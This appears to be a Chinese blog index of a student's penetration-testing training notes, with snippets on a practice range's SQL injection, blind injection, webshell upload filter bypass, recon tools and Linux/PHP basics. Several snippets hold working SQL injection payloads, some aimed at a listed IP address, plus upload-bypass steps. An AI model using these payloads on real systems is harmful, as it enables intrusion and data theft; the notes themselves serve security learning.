实训
简单.快乐
这个作者很懒,什么都没留下…
展开
-
7-6 在线靶场 第一章 第二章
封神台靶场目录第一章sqlmap第二章第一章查看返回多少列sql 可查询的函数查表命 列名爆库名ttp://59.63.200.79:8003/?id=100 union select 1,database() #爆表名http://59.63.200.79:8003/?id=100 union select 1,table_name from information_schema.tables where table_schema =‘maoshe’ limit 0,1#爆列原创 2020-07-07 19:37:54 · 221 阅读 · 0 评论 -
7-3 暴力破解
MD5在线破解泰阿红队单兵系统下载地址原创 2020-07-05 18:52:44 · 476 阅读 · 0 评论 -
7-2 使用xray工具
xray下载地址操作手册转载 2020-07-05 17:40:49 · 520 阅读 · 0 评论 -
7-1 上传webshell.php文件
随便选择一个图片文件拦截请求发送到repeater修改文件 名字 类型 以及下面的内容方法二把webshell.php 改名为 .jpg拦截 在brup 里改成 .php方法3直接发抓包所有文件类型都被拒创建htaccess.txt编译文件...原创 2020-07-05 16:29:59 · 565 阅读 · 0 评论 -
6-30 无回显sql注入(盲注) 基于位置注入 sqlmap参数
基于时间的盲注表名的字典1%27%20and%20if(ascii(substr(database(),1,1))>0,sleep(2),1)%20–+?id=1’ and if(ascii(substr(database(),1,1))=0,sleep(2),1) --+?id=1’ and if(left(database(),1)=‘s’,sleep(2),1) --+基于布尔的盲注?id=-1%27%20or%20left(database(),1)=%27u%27%20...原创 2020-07-02 14:50:44 · 2256 阅读 · 1 评论 -
6-29 有回显的sql注入
sql注入原理基于报错 分析sql语句有回现的sql注入 页面有反馈信息无回显的sql注入 页面无反馈信息1.union判断类型输出表名2.extractvalue3.updatexml原创 2020-06-29 22:55:29 · 180 阅读 · 0 评论 -
6-28 域名信息收集 扫描探测
->如果还没 就发送请求dnsw服务器->系统缓存域名劫持 通过攻击域名解析服务器(DNS),或伪造域名解析服务器(DNS)的方法,把目标网站域名解析到错误的IP地址从而实现用户无法访问目标网站的目的或者蓄意或恶意要求用户访问指定IP地址(网站)的目的。whois 协议安装wydomain用来找网站的子域名其他工具cms 指纹识别端口扫描工具http://www.nmap.com.cn/doc/manual.shtm#6nmap手册针对端口攻击搜索语法..原创 2020-06-28 20:01:05 · 218 阅读 · 0 评论 -
6-19 密码与加密 抓包工具wireshake
管道命令原创 2020-06-29 22:56:08 · 308 阅读 · 0 评论 -
6-18 php 环境搭建 ab测试工具
ab测试ab测试的api php环境搭建显示进程 ps aux原创 2020-06-29 22:56:31 · 90 阅读 · 0 评论 -
6-24 php
php环境搭建宝塔–服务器运维面板原创 2020-06-29 22:56:43 · 90 阅读 · 0 评论 -
6-17 网络配置 练习 下载软件
一般apt 就行解压缩 tar xvf ./[文件名]linux 下载tar gz 文件原创 2020-06-29 22:56:55 · 127 阅读 · 0 评论 -
6-16 网络配置与应用
配置网络 让虚拟机和主机可以互相ping(关防火墙)1.linux 查看网络 ping www.baidu.comctrl+c 中断查看 网络配置 ifconfigwindows 查看 ipconfig最好用桥接模式2如果不行 用nat连接重启ssh win 主机连接 虚拟机ssh [用户名]@[ip地址]输入密码远程传输下载...原创 2020-06-29 22:57:23 · 123 阅读 · 0 评论 -
6-15 实训 linux 基础操作
文件操作vim 三种模式切换权限管理r 读4 w写2 x执行1原创 2020-06-29 22:57:38 · 103 阅读 · 0 评论 -
6-20 网络协议基础
用代码向百度发送请求 百度返回百度网站改进后的代码http协议 格式http请求方法apache为了方便让文件目录对应网站路径 实际没有关系响应格式原创 2020-06-29 22:55:49 · 63 阅读 · 0 评论